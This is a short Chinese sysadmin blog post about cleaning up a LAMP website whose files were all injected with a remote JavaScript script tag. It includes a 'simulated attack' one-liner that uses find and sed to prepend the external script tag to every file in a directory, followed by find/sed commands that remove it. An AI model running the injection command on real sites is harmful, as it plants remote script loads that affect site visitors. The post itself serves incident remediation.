zoukankan      html  css  js  c++  java
  • 企业的网站遭受木马攻击了,导致网站目录下所有文件都被篡改了

    问题:

    一个 lamp 的服务器站点目录下所有文件均被植入如下内容

    <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>

    包括图片文件也被植入了,网站打开时就会调用这个地址,造成的影响很恶劣。

    实际解决办法:

    思路是:需要遍历所有目录有文件 把以上被植入的内容删除掉。

    1、  先备份数据。然后,执行命令批量修改回来。

    2、  a.备份原始出问题的原始文件; b.历史备份覆盖;c.find+sed 替换;

    模拟攻击

    find /oldboy/ -type f|xargs sed -i '1 i <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>'

    处理方法

    [root@test ~]# find /oldboy -type f|xargs sed -i 's# <script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>##g'
    [root@test ~]find. -type f -exec sed -i ‘s#<script language=javascript src=http://luoahong.blog.51cto.com/504977/1827164>##g’ {} ;
    这个命令是正确的语法,点号为特殊字符,使用、来转义(数去特殊字符代表的特殊含义,使用其本身的原始意义)对于本题可以不用转义

    2、查看处理结果,详细查看日志,追踪问题发生来源。

    3、提供亡羊补牢的解决方案(站点目录严格权限规划方案及新上线发布范围思路)

  • 相关阅读:
    JavaScript与OC的交互
    通过修改自动布局的约束实现键盘弹出后view上推
    Foundation框架之NSArray
    Foundation框架之NSString
    Foundation框架之常用结构体
    C语言中的预处理指令
    C语言指针使用总结
    C语言中函数的使用及多文件团队开发
    Foundation框架简介
    文件的输入与输出
  • 原文地址:https://www.cnblogs.com/luoahong/p/6198501.html
Copyright © 2011-2022 走看看